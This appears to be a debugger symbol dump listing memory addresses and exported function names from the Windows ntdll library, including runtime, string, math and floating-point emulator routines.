77f92e52 ntdll!RtlStringFromGUID
77f92ff0 ntdll!RtlGUIDFromString
77f932a0 ntdll!RtlIsNameLegalDOS8Dot3
77f93408 ntdll!RtlGenerate8dot3Name
77f93889 ntdll!RtlNtStatusToDosErrorNoTeb
77f9397e ntdll!RtlGetLastNtStatus
77f9398c ntdll!RtlGetLastWin32Error
77f93996 ntdll!RtlRestoreLastWin32Error
77f93996 ntdll!RtlSetLastWin32Error
77f939a6 ntdll!RtlNtStatusToDosError
77f939e6 ntdll!RtlSetLastWin32ErrorAndNtStatusFromNtStatus
77f93acc ntdll!RtlGetNtProductType
77f93c5e ntdll!RtlGetVersion
77f93e02 ntdll!VerSetConditionMask
77f93e3a ntdll!RtlVerifyVersionInfo
77f94188 ntdll!RtlInitString
77f941c0 ntdll!RtlInitAnsiString
77f941f8 ntdll!RtlInitUnicodeString
77f94234 ntdll!RtlInitializeContext
77f942ea ntdll!RtlRemoteCall
77f944d8 ntdll!RtlInitializeSListHead
77f944de ntdll!RtlInterlockedPopEntrySList
77f94520 ntdll!RtlInterlockedPushEntrySList
77f94530 ntdll!RtlInterlockedFlushSList
77f9453c ntdll!RtlQueryDepthSList
77f94593 ntdll!RtlIpv6AddressToStringA
77f9476e ntdll!RtlIpv4AddressToStringA
77f9482c ntdll!RtlIpv6AddressToStringW
77f94a16 ntdll!RtlIpv4AddressToStringW
77f94a4c ntdll!RtlIpv6StringToAddressA
77f94d26 ntdll!RtlIpv4StringToAddressA
77f94eec ntdll!RtlIpv6StringToAddressW
77f951d0 ntdll!RtlIpv4StringToAddressW
77f953ae ntdll!RtlLargeIntegerDivide
77f9564a ntdll!RtlLogStackBackTrace
77f957b4 ntdll!RtlPcToFileHeader
77f9608e ntdll!RtlSetIoCompletionCallback
77f963cc ntdll!RtlQueueWorkItem
77f965e0 ntdll!RtlRaiseException
77f96698 ntdll!RtlRaiseStatus
77f966c0 ntdll!RtlUniform
77f966e4 ntdll!RtlRandom
77f9672c ntdll!RtlRandomEx
77f9676e ntdll!RtlSetThreadPoolStartFunc
77f96c7a ntdll!RtlTraceDatabaseEnumerate
77f96cfc ntdll!RtlTraceDatabaseCreate
77f96e17 ntdll!RtlTraceDatabaseDestroy
77f96e70 ntdll!RtlTraceDatabaseValidate
77f96eb0 ntdll!RtlTraceDatabaseFind
77f97070 ntdll!RtlTraceDatabaseLock
77f97076 ntdll!RtlTraceDatabaseUnlock
77f9707c ntdll!RtlTraceDatabaseAdd
77f97602 ntdll!RtlUnhandledExceptionFilter2
77f97865 ntdll!RtlUnhandledExceptionFilter
77f97998 ntdll!RtlUnwind
77f97b12 ntdll!RtlpNtOpenKey
77f97b30 ntdll!RtlpNtCreateKey
77f97b56 ntdll!RtlpNtQueryValueKey
77f97c26 ntdll!RtlpNtSetValueKey
77f97c4c ntdll!RtlpNtMakeTemporaryKey
77f97c52 ntdll!RtlpNtEnumerateSubKey
77fa1f40 ntdll!CIcos
77fa1f54 ntdll!cos
77fa1ff0 ntdll!log
77fa1ff4 ntdll!CIlog
77fa20d0 ntdll!pow
77fa20d4 ntdll!CIpow
77fa22f0 ntdll!CIsin
77fa2304 ntdll!sin
77fa23a0 ntdll!CIsqrt
77fa23b4 ntdll!sqrt
77fa245a ntdll!isalpha
77fa2488 ntdll!isupper
77fa24b1 ntdll!islower
77fa24da ntdll!isdigit
77fa2503 ntdll!isxdigit
77fa2531 ntdll!isspace
77fa255a ntdll!ispunct
77fa2583 ntdll!isalnum
77fa25b1 ntdll!isprint
77fa25df ntdll!isgraph
77fa260d ntdll!iscntrl
77fa2636 ntdll!_isascii
77fa2643 ntdll!_toascii
77fa264b ntdll!_iscsymf
77fa2688 ntdll!_iscsym
77fa26d0 ntdll!alldiv
77fa2780 ntdll!alldvrm
77fa2860 ntdll!allmul
77fa2894 ntdll!chkstk
77fa2894 ntdll!alloca_probe
77fa28e0 ntdll!allrem
77fa29a0 ntdll!allshl
77fa29c0 ntdll!allshr
77fa29e1 ntdll!atol
77fa2a5c ntdll!atoi
77fa2a61 ntdll!atoi64
77fa2b00 ntdll!aulldiv
77fa2b70 ntdll!aulldvrm
77fa2c10 ntdll!aullrem
77fa2c90 ntdll!aullshr
77fa2cb0 ntdll!ftol
77fa2d15 ntdll!itoa
77fa2d3f ntdll!ltoa
77fa2d66 ntdll!ultoa
77fa2ded ntdll!i64toa
77fa2e1e ntdll!ui64toa
77fa2e39 ntdll!itow
77fa2e64 ntdll!ltow
77fa2e8f ntdll!ultow
77fa2eba ntdll!i64tow
77fa2ee8 ntdll!ui64tow
77fa2f16 ntdll!lfind
77fa2f50 ntdll!memccpy
77fa2fa3 ntdll!memicmp
77fa2fa8 ntdll!snprintf
77fa2fff ntdll!snwprintf
77fa306f ntdll!splitpath
77fa31b0 ntdll!stricmp
77fa31b0 ntdll!strcmpi
77fa31b5 ntdll!strlwr
77fa31d8 ntdll!strnicmp
77fa31e7 ntdll!strupr
77fa320a ntdll!tolower
77fa3212 ntdll!tolower
77fa3243 ntdll!toupper
77fa324b ntdll!toupper
77fa329a ntdll!vsnprintf
77fa32f0 ntdll!vsnwprintf
77fa335f ntdll!wcsicmp
77fa33aa ntdll!wcslwr
77fa33d6 ntdll!wcsnicmp
77fa342f ntdll!wcsupr
77fa345b ntdll!wtol
77fa34c0 ntdll!wtoi
77fa34c5 ntdll!wtoi64
77fa355b ntdll!labs
77fa355b ntdll!abs
77fa3570 ntdll!atan
77fa3615 ntdll!bsearch
77fa36b0 ntdll!ceil
77fa379d ntdll!fabs
77fa3850 ntdll!floor
77fa3941 ntdll!iswalpha
77fa3952 ntdll!iswlower
77fa3960 ntdll!iswdigit
77fa396e ntdll!iswxdigit
77fa397f ntdll!iswspace
77fa398d ntdll!iswctype
77fa39bd ntdll!mbstowcs
77fa3a30 ntdll!memchr
77fa3ae0 ntdll!memcmp
77fa3b90 ntdll!memcpy
77fa3ed0 ntdll!memmove
77fa4210 ntdll!memset
77fa42e0 ntdll!qsort
77fa4570 ntdll!sprintf
77fa45c8 ntdll!sscanf
77fa4610 ntdll!strcpy
77fa4620 ntdll!strcat
77fa4710 ntdll!strchr
77fa47d0 ntdll!strcmp
77fa4860 ntdll!strcspn
77fa48a0 ntdll!strlen
77fa4920 ntdll!strncat
77fa4a50 ntdll!strncmp
77fa4a90 ntdll!strncpy
77fa4b90 ntdll!strpbrk
77fa4bd0 ntdll!strrchr
77fa4c00 ntdll!strspn
77fa4c40 ntdll!strstr
77fa4e6d ntdll!strtol
77fa4e84 ntdll!strtoul
77fa4e9b ntdll!swprintf
77fa4f24 ntdll!tan
77fa4fc2 ntdll!towlower
77fa4fdd ntdll!towupper
77fa4fe7 ntdll!vsprintf
77fa503e ntdll!wcscat
77fa5068 ntdll!wcscpy
77fa5084 ntdll!wcschr
77fa50a6 ntdll!wcscmp
77fa50d8 ntdll!wcscspn
77fa511b ntdll!wcslen
77fa5131 ntdll!wcsncat
77fa516e ntdll!wcsncmp
77fa51a3 ntdll!wcsncpy
77fa51e0 ntdll!wcspbrk
77fa5220 ntdll!wcsrchr
77fa5250 ntdll!wcsspn
77fa5296 ntdll!wcsstr
77fa54b9 ntdll!wcstol
77fa54d0 ntdll!wcstoul
77fa54e7 ntdll!wcstombs
77fb0f34 ntdll!RtlInterlockedPushListSList
77fb0f5c ntdll!RtlFirstEntrySList
77fb0f90 ntdll!RtlUshortByteSwap
77fb0fa0 ntdll!RtlUlongByteSwap
77fb0fb0 ntdll!RtlUlonglongByteSwap
77fb0fd0 ntdll!RtlCompareMemory
77fb1020 ntdll!RtlCompareMemoryUlong
77fb1050 ntdll!RtlFillMemory
77fb10c0 ntdll!RtlFillMemoryUlong
77fb10e0 ntdll!RtlZeroMemory
77fb1110 ntdll!RtlMoveMemory
77fb1484 ntdll!RtlLargeIntegerAdd
77fb1498 ntdll!RtlEnlargedIntegerMultiply
77fb14a4 ntdll!RtlEnlargedUnsignedMultiply
77fb14b0 ntdll!RtlEnlargedUnsignedDivide
77fb14d0 ntdll!RtlExtendedLargeIntegerDivide
77fb152c ntdll!RtlExtendedMagicDivide
77fb15bc ntdll!RtlExtendedIntegerMultiply
77fb1614 ntdll!RtlLargeIntegerShiftLeft
77fb163c ntdll!RtlLargeIntegerShiftRight
77fb1664 ntdll!RtlLargeIntegerArithmeticShift
77fb1690 ntdll!RtlLargeIntegerNegate
77fb16a4 ntdll!RtlLargeIntegerSubtract
77fb16b8 ntdll!RtlConvertLongToLargeInteger
77fb16c0 ntdll!RtlConvertUlongToLargeInteger
77fb17a0 ntdll!RtlCaptureContext
77fbc000 ntdll!_eEmulatorInit
77fbc000 ntdll!_eFINIT
77fbc079 ntdll!_eCommonExceptions
77fbc9ef ntdll!_eFPREM
77fbca3d ntdll!_eFPREM1
77fbca4c ntdll!_eFSCALE
77fbca53 ntdll!_eFPATAN
77fbca71 ntdll!_eFYL2X
77fbca78 ntdll!_eFYL2XP1
77fbccda ntdll!_eFISUB16
77fbcce8 ntdll!_eFISUBR16
77fbccf6 ntdll!_eFIADD16
77fbcd02 ntdll!_eFISUB32
77fbcd10 ntdll!_eFISUBR32
77fbcd1e ntdll!_eFIADD32
77fbcd2a ntdll!_eFSUB32
77fbcd38 ntdll!_eFSUBR32
77fbcd46 ntdll!_eFADD32
77fbcd4f ntdll!_eFSUB64
77fbcd5a ntdll!_eFSUBR64
77fbcd65 ntdll!_eFADD64
77fbcd81 ntdll!_eFSUBPreg
77fbcd86 ntdll!_eFSUBreg
77fbcd88 ntdll!_eFSUBtop
77fbcd8e ntdll!_eFSUBRPreg
77fbcd93 ntdll!_eFSUBRreg
77fbcd95 ntdll!_eFSUBRtop
77fbcdb2 ntdll!_eFADDPreg
77fbcdb7 ntdll!_eFADDreg
77fbcdb9 ntdll!_eFADDtop
77fbcf6a ntdll!_eFIMUL16
77fbcf74 ntdll!_eFIMUL32
77fbcf7e ntdll!_eFMUL32
77fbcf88 ntdll!_eFMUL64
77fbcf92 ntdll!_eFMULPreg
77fbcf97 ntdll!_eFMULreg
77fbcf99 ntdll!_eFMULtop
77fbd129 ntdll!_eFIDIV16
77fbd133 ntdll!_eFIDIVR16
77fbd13d ntdll!_eFIDIV32
77fbd147 ntdll!_eFIDIVR32
77fbd151 ntdll!_eFDIV32
77fbd15b ntdll!_eFDIVR32
77fbd165 ntdll!_eFDIV64
77fbd16f ntdll!_eFDIVR64
77fbd179 ntdll!_eFDIVRPreg
77fbd17e ntdll!_eFDIVRreg
77fbd180 ntdll!_eFDIVRtop
77fbd1dc ntdll!_eFDIVPreg
77fbd1e1 ntdll!_eFDIVreg
77fbd1e3 ntdll!_eFDIVtop
77fbd376 ntdll!_eFRNDINT
77fbda35 ntdll!_eFLD32
77fbdaa1 ntdll!_eFLD64
77fbdb1e ntdll!_eFILD16
77fbdb55 ntdll!_eFILD32
77fbdb93 ntdll!_eFILD64
77fbdbfc ntdll!_eFLD80
77fbdc9e ntdll!_eFSTP
77fbdcf8 ntdll!_eFST
77fbddbc ntdll!_eFSTP64
77fbddc1 ntdll!_eFST64
77fbdfb0 ntdll!_eFSTP32
77fbdfb5 ntdll!_eFST32
77fbe13e ntdll!_eFISTP32
77fbe143 ntdll!_eFIST32
77fbe234 ntdll!_eFISTP16
77fbe239 ntdll!_eFIST16
77fbe2ec ntdll!_eFISTP64
77fbe373 ntdll!_eFSTP80
77fbe3ce ntdll!_eFABS
77fbe3df ntdll!_eFCHS
77fbe3ef ntdll!_eFFREE
77fbe3f5 ntdll!_eFXCH
77fbe479 ntdll!_eFICOMP16
77fbe490 ntdll!_eFICOM16
77fbe4a2 ntdll!_eFICOMP32
77fbe4b9 ntdll!_eFICOM32
77fbe4cb ntdll!_eFCOMP32
77fbe4e2 ntdll!_eFCOM32
77fbe4f4 ntdll!_eFCOMP64
77fbe50b ntdll!_eFCOM64
77fbe51d ntdll!_eFUCOMPP
77fbe52c ntdll!_eFUCOMP
77fbe53b ntdll!_eFUCOM
77fbe552 ntdll!_eFCOMPP
77fbe561 ntdll!_eFCOMP
77fbe570 ntdll!_eFCOM
77fbe70d ntdll!_eFXAM
77fbe733 ntdll!_eFTST
77fbe779 ntdll!_eFLD1
77fbe7b5 ntdll!_eFLDZ
77fbe7fb ntdll!_eFLDL2E
77fbe81d ntdll!_eFLDLN2
77fbe82e ntdll!_eFLDPI
77fbea55 ntdll!_eFXTRACT
77fbf144 ntdll!_eFCOS
77fbf1e9 ntdll!_eFSIN
77fbf23f ntdll!_eFPTAN
77fbfa07 ntdll!_eF2XM1
77fbfe40 ntdll!_eFLDCW
77fbfe86 ntdll!_eFSTCW
77fbfe92 ntdll!_eFSTSW
77fbfea7 ntdll!_eFDECSTP
77fbfec4 ntdll!_eFINCSTP
77fbfef2 ntdll!_eFSTENV
77fbff6e ntdll!_eFSAVE
77fbffdd ntdll!_eFRSTOR
77fc0023 ntdll!_eFLDENV
77fc0106 ntdll!_eGetStatusWord
77fc0165 ntdll!SaveEm87Context
77fc018e ntdll!RestoreEm87Context
77fc01e9 ntdll!_eFSQRT
77fc1f10 ntdll!fltused
77fc34a8 ntdll!NlsAnsiCodePage
77fc34c0 ntdll!NlsMbCodePageTag
77fc36d8 ntdll!NlsMbOemCodePageTag